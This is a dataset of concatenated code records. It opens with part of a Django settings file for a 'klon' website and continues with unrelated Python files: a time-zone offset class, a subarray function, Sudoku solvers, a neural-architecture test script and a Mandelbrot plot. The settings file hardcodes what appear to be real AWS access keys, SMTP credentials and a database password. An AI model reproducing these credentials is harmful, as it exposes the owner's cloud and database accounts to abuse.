['172.31.0.0/16',]\n\nINSTALLED_APPS = [\n 'home.apps.HomeConfig',\n 'api.apps.ApiConfig',\n\n 'django_filters',\n 'storages',\n 'multiselectfield',\n 'corsheaders',\n 'phonenumber_field',\n\n 'rest_framework',\n 'rest_framework.authtoken',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'rest_auth',\n 'rest_auth.registration',\n\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n]\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n 'corsheaders.middleware.CorsMiddleware',\n 'allow_cidr.middleware.AllowCIDRMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'klon.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages'\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'klon.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'klon',\n 'USER': 'klon',\n 'PASSWORD': '68YSehZhc8Ph8Pd',\n 'HOST': 'klon.cd8iujepsg4q.ap-northeast-1.rds.amazonaws.com',\n 'PORT': '5432',\n }\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 'rest_framework_jwt.authentication.JSONWebTokenAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n # 'rest_framework.authentication.SessionAuthentication',\n ],\n 'DEFAULT_FILTER_BACKENDS': ('django_filters.rest_framework.DjangoFilterBackend',),\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 20\n}\n\nCORS_ORIGIN_WHITELIST = (\n 'localhost:8000',\n '127.0.0.1:8000',\n 'klon-production.ap-northeast-1.elasticbeanstalk.com',\n 'd2lsr90acgtyop.cloudfront.net',\n 'klongroup.com',\n)\n\nREST_USE_JWT = True\nREST_SESSION_LOGIN = False\n\nJWT_AUTH = {\n 'JWT_ALLOW_REFRESH': True,\n 'JWT_EXPIRATION_DELTA': datetime.timedelta(days=7),\n}\n\nREST_AUTH_SERIALIZERS = {\n 'USER_DETAILS_SERIALIZER': 'api.serializers.UserSerializer'\n}\n\nDEFAULT_FROM_EMAIL = 'admin@klongroup.com'\nSERVER_EMAIL = 'admin@klongroup.com'\nEMAIL_BACKEND = 'django_smtp_ssl.SSLEmailBackend'\nEMAIL_HOST = 'email-smtp.us-west-2.amazonaws.com'\nEMAIL_PORT = 465\nEMAIL_USE_TLS = True\nEMAIL_HOST_USER = 'AKIAJQF3LEPENNUVGRHA'\nEMAIL_HOST_PASSWORD = 'Aqw55LzzfNfYznrzW382S2Lg3oVxEkMQ5sGCmhLq/hvZ'\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n)\n\nLANGUAGE_CODE = 'en-us'\nTIME_ZONE = 'Asia/Tokyo'\nUSE_I18N = True\nUSE_L10N = True\nUSE_TZ = True\n\nCSRF_COOKIE_SECURE = True\nCSRF_USE_SESSIONS = True\n\nAWS_S3_OBJECT_PARAMETERS = {\n'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n'CacheControl': 'max-age=94608000',\n}\n\nAWS_S3_HOST = \"s3-ap-northeast-1.amazonaws.com\"\nAWS_STORAGE_BUCKET_NAME = 'klons3'\nAWS_CLOUDFRONT_DOMAIN = 'd2ec47gai1sijw.cloudfront.net'\nAWS_S3_REGION_NAME = 'us-west-2'\nAWS_ACCESS_KEY_ID = 'AKIAISP2GY73LRP5AXFQ'\nAWS_SECRET_ACCESS_KEY = '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'\n\nAWS_S3_CUSTOM_DOMAIN = 'd2ec47gai1sijw.cloudfront.net'\nAWS_S3_FILE_OVERWRITE = False\n\nMEDIAFILES_LOCATION = 'media'\nMEDIA_ROOT = '/%s/' % MEDIAFILES_LOCATION\nMEDIA_URL = '//%s/%s/' % (AWS_CLOUDFRONT_DOMAIN, MEDIAFILES_LOCATION)\nDEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n\nSTATICFILES_LOCATION = 'static'\nSTATIC_ROOT = '/%s/' % STATICFILES_LOCATION\nSTATIC_URL = '//%s/%s/' % (AWS_CLOUDFRONT_DOMAIN, STATICFILES_LOCATION)\nSTATICFILES_STORAGE = 'custom_storages.StaticStorage'\n\n# AWS_DEFAULT_ACL = None\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'verbose': {\n 'format': '[contactor] %(levelname)s %(asctime)s %(message)s'\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n },\n 'syslog':{\n 'level':'INFO',\n 'class': 'logging.handlers.SysLogHandler',\n 'address': '/dev/log',\n 'formatter': 'verbose',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console', 'syslog', ],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n }\n}","repo_name":"shunkakinoki/klon_website","sub_path":"klon/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74426223411","text":"__author__ = 'Tyler'\nimport numpy as np\nfrom utils.bp.temporal.temporal_queries import TemporalQueries\n\nclass ZoneOffset(object):\n def __init__(self, total_seconds):\n self.total_seconds = total_seconds\n self.id = ZoneOffset.build_id(total_seconds)\n\n SECONDS_CACHE = dict()\n ID_CACHE = dict()\n ID_CACHE = dict()\n SECONDS_PER_HOUR = 60 * 60\n SECONDS_PER_MINUTE = 60\n MINUTES_PER_HOUR = 60\n MAX_SECONDS = 18 * SECONDS_PER_HOUR\n\n @classmethod\n def of(cls, offset_id):\n offset = cls.ID_CACHE.get(offset_id)\n if offset is not None:\n return offset\n if len(offset_id) == 2:\n offset_id = offset_id[0] + '0' + offset_id[1]\n if len(offset_id) == 3:\n hours = int(offset_id[1])\n minutes = 0\n seconds = 0\n elif len(offset_id) == 5:\n hours = int(offset_id[1])\n minutes = int(offset_id[3])\n seconds = 0\n elif len(offset_id) == 6:\n hours = int(offset_id[1])\n minutes = int(offset_id[4])\n seconds = 0\n elif len(offset_id) == 7:\n hours = int(offset_id[1])\n minutes = int(offset_id[3])\n seconds = int(offset_id[5])\n elif len(offset_id) == 9:\n hours = int(offset_id[1])\n minutes = int(offset_id[4])\n seconds = int(offset_id[7])\n else:\n raise Exception('Invalid ID')\n first_ch = offset_id[0]\n if first_ch != '+' and first_ch != '-':\n raise Exception('Invalid ID')\n if first_ch == '-':\n return cls.of_hours_minutes_seconds(-hours, -minutes, -seconds)\n else:\n return cls.of_hours_minutes_seconds(hours, minutes, seconds)\n\n @classmethod\n def parse_number(cls, offset_id, pos, preceded_by_colon):\n if preceded_by_colon and offset_id[pos-1] != ':':\n raise Exception('Invalid Id')\n ch1 = offset_id[pos]\n ch2 = offset_id[pos + 1]\n if ch1 < '0' or ch1 > '9' or ch2 < '0' or ch2 > '9':\n raise Exception('Invalid Id')\n return (int(ch1) - 48) * 10 + (int(ch2) - 48)\n\n @classmethod\n def of_hours(cls, hours):\n return cls.of_hours_minutes_seconds(hours, 0, 0)\n\n @classmethod\n def of_hours_minutes(cls, hours, minutes):\n return cls.of_hours_minutes_seconds(hours, minutes, 0)\n\n @classmethod\n def of_hours_minutes_seconds(cls, hours, minutes, seconds):\n total_seconds = cls.total_seconds(hours, minutes, seconds)\n return cls.of_total_seconds(total_seconds)\n\n @classmethod\n def from_temporal(cls, temporal):\n offset = temporal.query(TemporalQueries.offset())\n if offset is not None:\n raise Exception('Unable to obtain')\n return offset\n\n @classmethod\n def total_seconds(cls, hours, minutes, seconds):\n return hours*cls.SECONDS_PER_HOUR + \\\n minutes*cls.SECONDS_PER_MINUTE + seconds\n\n @classmethod\n def of_total_seconds(cls, total_seconds):\n if np.abs(total_seconds) > cls.MAX_SECONDS:\n raise Exception('zone not in range')\n if np.mod(total_seconds, 15*cls.SECONDS_PER_MINUTE) == 0:\n total_secs = int(total_seconds)\n result = cls.SECONDS_CACHE.get(total_secs)\n if result is None:\n result = ZoneOffset(total_seconds)\n cls.SECONDS_CACHE[total_secs] = result\n result = cls.SECONDS_CACHE.get(total_secs)\n cls.ID_CACHE[result.get_id()] = result\n return result\n else:\n return ZoneOffset(total_seconds)\n\n @classmethod\n def build_id(cls, total_seconds):\n if total_seconds == 0:\n return 'Z'\n else:\n abs_total_seconds = np.abs(total_seconds)\n abs_hours = abs_total_seconds/cls.SECONDS_PER_HOUR\n abs_minutes = np.mod(abs_total_seconds/cls.SECONDS_PER_MINUTE,\n cls.MINUTES_PER_HOUR)\n return_string = ''\n if total_seconds < 0:\n return_string += '-'\n else:\n return_string += '+'\n if abs_hours < 10:\n return_string += '0' + str(abs_hours)\n else:\n return_string += '' + str(abs_hours)\n if abs_minutes < 10:\n return_string += '0' + str(abs_minutes)\n else:\n return_string += '' + str(abs_minutes)\n abs_seconds = np.mod(abs_total_seconds, cls.SECONDS_PER_MINUTE)\n if abs_seconds != 0:\n if abs_seconds < 10:\n return_string += '0' + str(abs_seconds)\n else:\n return_string += '' + str(abs_seconds)\n return return_string\n\n def get_total_seconds(self):\n return self.total_seconds\n\n def get_id(self):\n return self.id\n\n def get_rules(self):\n #return ZoneRules.of(self)\n pass\n\n\n","repo_name":"tylerrbowen/sample","sub_path":"utils/bp/zone_offset.py","file_name":"zone_offset.py","file_ext":"py","file_size_in_byte":5005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6484282973","text":"#!/usr/bin/env python\n# _*_coding:utf-8_*_\n\n\"\"\"\n @Time : 19-1-11 上午10:48\n @Author: qcymkxyc\n @File: book1.py\n @Software: PyCharm\n\n\n\"\"\"\n\n\ndef max_sub_nums(nums):\n \"\"\"最大和的连续子数组\n\n :param nums: List[int]\n 数组\n :return: List[int],int\n 子数组,和\n \"\"\"\n # 空数组\n if len(nums) == 0:\n return nums,0\n\n # 如果全是负数\n if len(list(filter(lambda x: x < 0, nums))) == len(nums):\n return [], 0\n\n max_sum = 0\n pre_sum = 0\n start, end = 0, len(nums) - 1\n for i, num in enumerate(nums):\n if pre_sum + num <= num:\n start = i\n pre_sum = num\n else:\n pre_sum += num\n\n if pre_sum > max_sum:\n max_sum = pre_sum\n end = i\n\n return nums[start: end + 1], max_sum\n","repo_name":"qcymkxyc/JZoffer","sub_path":"main/question42/book1.py","file_name":"book1.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71017705654","text":"# solve Sudoku by LMH\n# this program can solve Sudoku problem with only one solution\n# input should be 9 rows without any space in each row\n# the number need to be filled should be 0 when inputing\n# e.g.:\n# 072100500\n# 030020409\n# 580047100\n# 026700950\n# 043065010\n# 057000643\n# 004971020\n# 210386090\n# 000000360\n\n# the output will be\n# [4, 7, 2, 1, 9, 3, 5, 8, 6]\n# [6, 3, 1, 5, 2, 8, 4, 7, 9]\n# [5, 8, 9, 6, 4, 7, 1, 3, 2]\n# [1, 2, 6, 7, 3, 4, 9, 5, 8]\n# [9, 4, 3, 8, 6, 5, 2, 1, 7]\n# [8, 5, 7, 2, 1, 9, 6, 4, 3]\n# [3, 6, 4, 9, 7, 1, 8, 2, 5]\n# [2, 1, 5, 3, 8, 6, 7, 9, 4]\n# [7, 9, 8, 4, 5, 2, 3, 6, 1]\n\n####################################################\n# function [data_room, flag_finish, potential_list] = uniquely_fill(data_room)\n# uniquely fill the table\n# if flag_finish==0, we need potential_list to find \ndef uniquely_fill(data_room):\n flag_changed = 1\n flag_finish = 1\n while(flag_changed==1):\n flag_changed = 0 # if still unfinish in this loop, this flag will be reset\n flag_finish = 1\n # bulid the potential list\n potential_list = list()\n for i in range(0,9):\n potential_list_onerow = list()\n for j in range(0,9):\n if (data_room[i][j] != 0): # there is a number in this space\n potential_list_onedata= list() # append an empty list\n else:\n flag_finish = 0 # haven't finish yet\n # delete the impotential number\n potential_list_onedata = list([1,2,3,4,5,6,7,8,9])\n for num in range(1,10):\n for k in range(0,9):\n if (data_room[k][j] == num):\n try:\n potential_list_onedata.remove(num)\n except ValueError:\n pass\n if (data_room[i][k] == num):\n try:\n potential_list_onedata.remove(num)\n except ValueError:\n pass\n start_square_row = int(i/3)*3\n start_square_column = int(j/3)*3\n for k_row in range(start_square_row,start_square_row+3):\n for k_column in range(start_square_column,start_square_column+3):\n if (data_room[k_row][k_column] == num):\n try:\n potential_list_onedata.remove(num)\n except ValueError:\n pass\n potential_list_onerow.append(potential_list_onedata)\n potential_list.append(potential_list_onerow)\n\n # only one number is potential in a space\n for i in range(0,9):\n for j in range(0,9):\n if(len(potential_list[i][j])==1): \n data_room[i][j] = potential_list[i][j][0]\n flag_changed = 1\n\n for num in range(1,10):\n # in a row, one number can only appear in one space\n for i in range(0,9):\n counts_appear_in_potential = 0\n fill_index_j = -1\n for j in range(0,9):\n if (potential_list[i][j].count(num) == 1):\n counts_appear_in_potential = counts_appear_in_potential + 1\n fill_index_j = j\n if (counts_appear_in_potential == 1):\n data_room[i][fill_index_j] = num\n flag_changed = 1\n\n # in a column, one number can only appear in one space\n for j in range(0,9):\n counts_appear_in_potential = 0\n fill_index_i = -1\n for i in range(0,9):\n if (potential_list[i][j].count(num) == 1):\n counts_appear_in_potential = counts_appear_in_potential + 1\n fill_index_i = i\n if (counts_appear_in_potential == 1):\n data_room[fill_index_i][j] = num\n flag_changed = 1\n \n # in a square, one number can only appear in one space, to do\n\n # output, if flag_finish==0, we need potential_list to find \n return data_room, flag_finish, potential_list\n\n####################################################\n# function [least_potential, x_of_least_potential, y_of_least_potential] = multi_solution_indicate(data_room,potential_list)\n# indicate how many solutions there are, and the space that routes to multiple solutions \ndef multi_solution_indicate(data_room,potential_list):\n least_potential = 10\n x_of_least_potential = list()\n y_of_least_potential = list()\n for i in range(0,9):\n for j in range(0,9):\n if (data_room[i][j] == 0):\n len_potent = len(potential_list[i][j])\n if (len_potent < least_potential):\n least_potential = len_potent\n for i in range(0,9):\n for j in range(0,9):\n if (data_room[i][j] == 0):\n len_potent = len(potential_list[i][j])\n if (len_potent == least_potential):\n least_potential = len_potent\n x_of_least_potential.append(i)\n y_of_least_potential.append(j)\n return least_potential,x_of_least_potential,y_of_least_potential\n \n####################################################\n# function bool = is_potential_list_empty(potential_list)\n# check if a potential_list is empty\ndef is_potential_list_empty(potential_list):\n max_len_potent = 0\n for i in range(0,9):\n for j in range(0,9):\n len_potent = len(potential_list[i][j])\n if (len_potent>max_len_potent):\n max_len_potent = len_potent\n if (max_len_potent == 0):\n return True\n else:\n return False\n\n####################################################\n# function bool = check_sudoku(data_room)\n# perform after unique_fill() with is_finish==True\n# to check the result is valid\ndef check_sudoku(data_room):\n flag_valid = True\n for i in range(0,9):\n sum_data = 0\n for j in range(0,9):\n sum_data = sum_data + data_room[i][j]\n if (sum_data!=45):\n flag_valid = False\n for j in range(0,9):\n sum_data = 0\n for i in range(0,9):\n sum_data = sum_data + data_room[i][j]\n if (sum_data!=45):\n flag_valid = False\n return flag_valid\n\n# read data and create main room for data\ninput_data = list()\nfor i in range(0,9):\n str_read = input()\n input_data.append(str_read)\n\nData_room = list() \nfor i in range(0,9):\n one_row = list()\n for j in range(0,9):\n one_row.append(int(input_data[i][j]))\n Data_room.append(one_row)\n\n[Data_room, is_finish, potential_table] = uniquely_fill(Data_room)\nif ((is_finish == 1) and (check_sudoku(Data_room))):\n for i in range(0,9):\n print(Data_room[i])\n print()\nelse: # may be multiple solution\n [least_potential, x_list, y_list] = multi_solution_indicate(Data_room,potential_table)\n for test in range(0,len(x_list)):\n for n in potential_table[x_list[test]][y_list[test]]:\n Data_room_try = list()\n for i in range(0,9):\n Data_room_try_oneRow = list()\n for j in range(0,9):\n Data_room_try_oneRow.append(Data_room[i][j])\n Data_room_try.append(Data_room_try_oneRow)\n Data_room_try[x_list[test]][y_list[test]] = n\n [Data_room_result, is_finish, potential_table_2nd] = uniquely_fill(Data_room_try)\n if ((is_finish == 1) and (check_sudoku(Data_room_result))):\n for print_index in range(0,9):\n print(Data_room_result[print_index])\n print()\n for i in range(0,9):\n for j in range(0,9):\n try:\n potential_table[i][j].remove(Data_room_result[i][j])\n except ValueError:\n pass\n","repo_name":"linmh0130/solve_sudoku","sub_path":"solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41637601263","text":"import os\nimport sys\nimport glob\nimport numpy as np\nimport torch\nimport utils\nimport logging\nimport argparse\nimport torch.nn as nn\nimport genotypes\nimport torch.utils\nimport torchvision.datasets as dset\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transform\n\nfrom torch.autograd import Variable\nfrom model import NetworkCIFAR as Network\nimport dataset\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser(\"cifar\")\nparser.add_argument('--data', type=str, default='../data', help='location of the data corpus')\nparser.add_argument('--batch_size', type=int, default=50, help='batch size')\nparser.add_argument('--report_freq', type=float, default=50, help='report frequency')\nparser.add_argument('--gpu', type=int, default=0, help='gpu device id')\nparser.add_argument('--init_channels', type=int, default=36, help='num of init channels')\nparser.add_argument('--layers', type=int, default=9, help='total number of layers')\nparser.add_argument('--model_path', type=str, default='/home/lab540/PycharmProjects/darts_skeleton/eval-EXP-20200719-212149/weights.pt', help='path of pretrained model')\nparser.add_argument('--auxiliary', action='store_true', default=False, help='use auxiliary tower')\nparser.add_argument('--cutout', action='store_true', default=True, help='use cutout')\nparser.add_argument('--cutout_length', type=int, default=16, help='cutout length')\nparser.add_argument('--drop_path_prob', type=float, default=0.2, help='drop path probability')\nparser.add_argument('--seed', type=int, default=0, help='random seed')\nparser.add_argument('--arch', type=str, default='kinetics_112se41', help='which architecture to use')\nargs = parser.parse_args()\n\nlog_format = '%(asctime)s %(message)s'\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO,\n format=log_format, datefmt='%m/%d %I:%M:%S %p')\n\nntu_CLASSES = 400\n\n\ndef main():\n if not torch.cuda.is_available():\n logging.info('no gpu device available')\n sys.exit(1)\n\n np.random.seed(args.seed)\n torch.cuda.set_device(args.gpu)\n cudnn.benchmark = True\n torch.manual_seed(args.seed)\n cudnn.enabled=True\n torch.cuda.manual_seed(args.seed)\n logging.info('gpu device = %d' % args.gpu)\n logging.info(\"args = %s\", args)\n\n genotype = eval(\"genotypes.%s\" % args.arch)\n model = Network(args.init_channels, ntu_CLASSES, args.layers, args.auxiliary, genotype)\n model = model.cuda()\n utils.load(model, args.model_path)\n\n logging.info(\"param size = %fMB\", utils.count_parameters_in_MB(model))\n\n criterion = nn.CrossEntropyLoss()\n criterion = criterion.cuda()\n\n validset = dataset.MyDataset('/media/lab540/79eff75a-f78c-42f2-8902-9358e88bf654/lab540/Neura_auto_search/datasets/kinetics_convert/test.txt',\n transform = transform.ToTensor())\n valid_queue = torch.utils.data.DataLoader(validset, batch_size=args.batch_size, shuffle=False, num_workers=1)\n\n # _, test_transform = utils._data_transforms_cifar10(args)\n # test_data = dset.CIFAR10(root=args.data, train=False, download=True, transform=test_transform)\n #\n # test_queue = torch.utils.data.DataLoader(\n # test_data, batch_size=args.batch_size, shuffle=False, pin_memory=True, num_workers=2)\n\n model.drop_path_prob = args.drop_path_prob\n test_acc, test_obj = infer(valid_queue, model, criterion)\n logging.info('test_acc %f', test_acc)\n\n\ndef infer(valid_queue, model, criterion):\n objs = utils.AvgrageMeter()\n top1 = utils.AvgrageMeter()\n top5 = utils.AvgrageMeter()\n model.eval()\n\n\n # true_labels = []\n predicted_labels = []\n with torch.no_grad():\n for step, (input, target) in enumerate(valid_queue):\n input = Variable(input, volatile=True).cuda()\n target = Variable(target, volatile=True).cuda()\n\n logits, _ = model(input)\n _, predicted = torch.max(logits.data, 1)\n for i in range(predicted.shape[0]):\n predicted_labels.append(predicted[i])\n loss = criterion(logits, target)\n\n prec1, prec5 = utils.accuracy(logits, target, topk=(1, 5))\n n = input.size(0)\n objs.update(loss.data[0], n)\n top1.update(prec1.data[0], n)\n top5.update(prec5.data[0], n)\n\n if step % args.report_freq == 0:\n logging.info('test %03d %e %f %f', step, objs.avg, top1.avg, top5.avg)\n predicted_labels = np.asarray(predicted_labels)\n np.save('/home/lab540/PycharmProjects/darts_skeleton/predicted_labels3.npy', predicted_labels)\n return top5.avg, top1.avg\n\n\nif __name__ == '__main__':\n main() \n\n","repo_name":"zhy0860/phi","sub_path":"SAR-NAS/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40083494026","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\"\"\"\nI Don't fully understand this one yet, it's pretty though. \n\ncomplex_matrix returns an array of real and imaginary numbers for is stable to work on\nis_stable contains the definition of the mandelbrot function\n\"\"\"\n\n\n# Linearly spaced real and imaginary numbers between xmin, xmax and ymin, ymax, pixel density amount.\ndef complex_matrix(xmin, xmax, ymin, ymax, pixel_density):\n real = np.linspace(xmin, xmax, int((xmax - xmin) * pixel_density))\n imaginary = np.linspace(ymin, ymax, int((ymax - ymin) * pixel_density))\n return real[np.newaxis, :] + imaginary[:, np.newaxis] * 1j\n\n\ndef is_stable(c, num_iterations):\n z = 0\n for _ in range(num_iterations):\n z = z ** 2 + c\n return abs(z) <= 2\n\n\nif __name__ == '__main__':\n c = complex_matrix(-2, 0.5, -1.5, 1.5, pixel_density=512)\n plt.imshow(is_stable(c, num_iterations=20), cmap=\"binary\")\n plt.gca().set_aspect(\"equal\")\n plt.axis(\"off\")\n plt.tight_layout()\n plt.show()\n","repo_name":"BillyUdders/algorithms","sub_path":"src/mandelbrot_set.py","file_name":"mandelbrot_set.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23604833785","text":"#there's about a 1/25 chance for the programm to freeze after you hit solve\n#most of the time the puzzle will sovle almost instanly but could take a couple seconds\nfrom tkinter import *\nfrom sudokuSolver import solve\nfrom sudokuMaker import makePuzzel\nfrom sudokuChecker import checkBoard\n#global vars\nsectionsNums = []\nfor i in range(9):\n sectionsNums.append([])\n for n in range(3):\n sectionsNums[i].append([\" \",\" \",\" \"])\nsectionsBtns = []\ncurrentCoord=\"000\"\nnumberOfFilledSquares = 17\n#create root\nroot = Tk()\nroot.title(\"sudoku\")\nroot.config(background=\"purple\")\n\n#string vars\nsection = StringVar()\nrow = StringVar()\ncol = StringVar()\nout = StringVar()\n\n#functions\n\n#when you click on a sudoku square it sets the new cords\ndef setNewCord(cord):\n global currentCoord\n currentCoord=cord\n section.set(f\"Section: {int(currentCoord[0])+1}\")\n row.set(f\"Row: {round(int(currentCoord[1])+(int(currentCoord[0])-int(currentCoord[0])%3))+1}\")\n col.set(f\"Column: {int(currentCoord[2])+(int(currentCoord[0])%3)*3+1}\")\n out.set(\"\")\n\n#sets number in current square when you click on a num button \ndef setNum(num):\n global currentCoord\n global sectionsBtns\n global sectionsNums\n global out\n spot = sectionsBtns[int(currentCoord[0])][int(currentCoord[1])][int(currentCoord[2])]\n if spot.changable:\n spot.config(text=num)\n sectionsNums[int(currentCoord[0])][int(currentCoord[1])][int(currentCoord[2])] = num\n out.set(\"\")\n else:\n out.set(\"sorry you can't chang ethat square\")\n \n#sets all the sudoku buttons to the corrisponding values in the section list\ndef setAllNums():\n global sectionsNums\n global sectionsBtns\n for section in range(len(sectionsBtns)):\n for row in range(len(sectionsBtns[section])):\n for spot in range(len(sectionsBtns[section][row])):\n sectionsBtns[section][row][spot].config(text = sectionsNums[section][row][spot])\n if sectionsNums[section][row][spot].isdigit():\n sectionsBtns[section][row][spot].config(bg = \"Dark Grey\")\n sectionsBtns[section][row][spot].changable = False\n else:\n sectionsBtns[section][row][spot].config(bg = \"Grey\")\n sectionsBtns[section][row][spot].changable = True\n\n#runs the puzzle through the solving alg\ndef solvePuzzle():\n global sectionsNums\n global out\n if checkBoard(convertBoardToSolve()):\n #copy's board to save data\n copyOboard = []\n for i in range(9):\n copyOboard.append([[' ',' ',' '],[' ',' ',' '],[' ',' ',' ']])\n for s in range(len(sectionsNums)):\n for r in range(len(sectionsNums[s])):\n for c in range(len(sectionsNums[s][r])):\n copyOboard[s][r][c] = sectionsNums[s][r][c]\n \n readListORows(solve(convertBoardToSolve())) \n setAllNums()\n #if nopthing changed then there was no solution found\n if sectionsNums == copyOboard:\n out.set(\"sorry, no solution was found\")\n else:\n out.set(\"Puzzle is solved :)\")\n else:\n out.set(\"Puzzle is invalid :(\")\n \n#used to help change between the diffrent board formats\ndef secColCheck(c):\n if c in range(0,3):\n return 0\n elif c in range(3,6):\n return 1\n else:\n return 2\n\n#converts sectionNums to a readiable format for the solver (a list of rows rather than a list of sections)\ndef convertBoardToSolve():\n global sectionsNums\n listORows=[]\n for _ in range(9):\n listORows.append([])\n for s in range(len(sectionsNums)):\n for r in range(len(sectionsNums[s])):\n for c in sectionsNums[s][r]:\n listORows[((s-s%3))+r].append(c)\n return listORows\n \n#reformats the list of rows back to a list of sections\ndef readListORows(board):\n global sectionsNums\n for r in range(len(board)):\n for c in range(len(board[r])):\n if r in range(0,3):\n s=secColCheck(c)\n elif r in range(3,6):\n s=secColCheck(c)+3\n else:\n s=secColCheck(c)+6\n sectionsNums[s][r%3][c%3] = board[r][c]\n\n#generates a new puzzle\ndef newPuzzle():\n global out\n global numberOfFilledSquares\n readListORows(makePuzzel(numberOfFilledSquares))\n setAllNums()\n out.set(\"have fun :)\")\n \n#makes the board blank\ndef clearBoard():\n global sectionsNums\n sectionsNums = []\n for i in range(9):\n sectionsNums.append([])\n for n in range(3):\n sectionsNums[i].append([\" \",\" \",\" \"])\n out.set(\"look at that clean board :)\")\n setAllNums()\n\n#checks the current board\ndef check():\n global sectionsNums\n global out\n notSolved = False\n done = False\n if checkBoard(convertBoardToSolve()):\n while not(notSolved or done):\n for sec in sectionsNums:\n for row in sec:\n for char in row:\n if char == \" \":\n notSolved = True\n done = True\n if notSolved:\n out.set(\"Looks good so far\")\n else:\n out.set(\"Great work!\")\n else:\n out.set(\"you messed up somewhere\")\n#boring stuff\n\n#sudoku buttom board\nsudokuFrame = Frame(root,height=30,width=60,bg=\"purple\")\nsudokuFrame.pack()\nfor i in range(9):\n sectionFrame = Frame(sudokuFrame,bd=3,height=10,width=20,bg=\"purple\")\n if i<3:\n sectionFrame.grid(row=0, column=i%3)\n elif i<6:\n sectionFrame.grid(row=1, column=i%3)\n else:\n sectionFrame.grid(row=2, column=i%3)\n sectionsBtns.append([[],[],[]])\n for n in range(9):\n sudokuBTN = Button(sectionFrame,bd=5,width=6,height=3)\n if n<3:\n sudokuBTN.grid(row=0, column=n%3,padx=2,pady=2)\n sudokuBTN.cord = f\"{i}0{n%3}\"\n sudokuBTN.changable = True\n sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n sectionsBtns[i][0].append(sudokuBTN)\n elif n<6:\n sudokuBTN.grid(row=1, column=n%3,padx=2,pady=2)\n sudokuBTN.cord = f\"{i}1{n%3}\"\n sudokuBTN.changable = True\n sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n sectionsBtns[i][1].append(sudokuBTN)\n else:\n sudokuBTN.grid(row=2, column=n%3,padx=2,pady=2)\n sudokuBTN.cord = f\"{i}2{n%3}\"\n sudokuBTN.changable = True\n sudokuBTN.config(command= lambda cord = sudokuBTN.cord: setNewCord(cord))\n sectionsBtns[i][2].append(sudokuBTN)\n\n#coord system lables\ncoordFrame = Frame(root,height=3,width=60,bg=\"purple\")\ncoordFrame.pack()\nsecLable = Label(coordFrame,height=2,width=20,textvariable= section,fg=\"white\",bg=\"purple\").grid(row=0,column=0)\nrowLable = Label(coordFrame,height=2,width=20,textvariable= row,fg=\"white\",bg=\"purple\").grid(row=0,column=1)\ncolLable = 